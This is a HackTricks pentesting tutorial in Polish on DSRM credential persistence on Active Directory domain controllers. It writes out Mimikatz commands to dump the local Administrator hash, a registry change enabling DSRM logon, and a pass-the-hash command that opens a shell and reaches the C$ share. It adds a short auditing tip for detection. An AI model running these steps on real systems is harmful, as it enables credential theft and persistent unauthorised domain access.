4.2 KiB
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.
Poświadczenia DSRM
W każdym DC znajduje się lokalne konto administratora. Posiadając uprawnienia administratora na tym komputerze, możesz użyć mimikatz, aby wydobyć skrót lokalnego hasła Administratora. Następnie, modyfikując rejestr, aktywujesz to hasło, dzięki czemu możesz zdalnie uzyskać dostęp do tego lokalnego użytkownika Administratora.
Najpierw musimy wydobyć skrót hasła lokalnego użytkownika Administratora wewnątrz DC:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
Następnie musimy sprawdzić, czy to konto będzie działać, a jeśli klucz rejestru ma wartość "0" lub nie istnieje, musisz ustawić go na "2":
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
Następnie, używając PTH, możesz wyświetlić zawartość C$ lub nawet uzyskać powłokę. Zauważ, że aby utworzyć nową sesję PowerShell z tym hasłem w pamięci (dla PTH), "domena" używana to po prostu nazwa maszyny DC:
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
Więcej informacji na ten temat znajdziesz tutaj: https://adsecurity.org/?p=1714 i https://adsecurity.org/?p=1785
Zapobieganie
- Identyfikator zdarzenia 4657 - Audyt tworzenia/zmiany
HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć reklamę swojej firmy w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.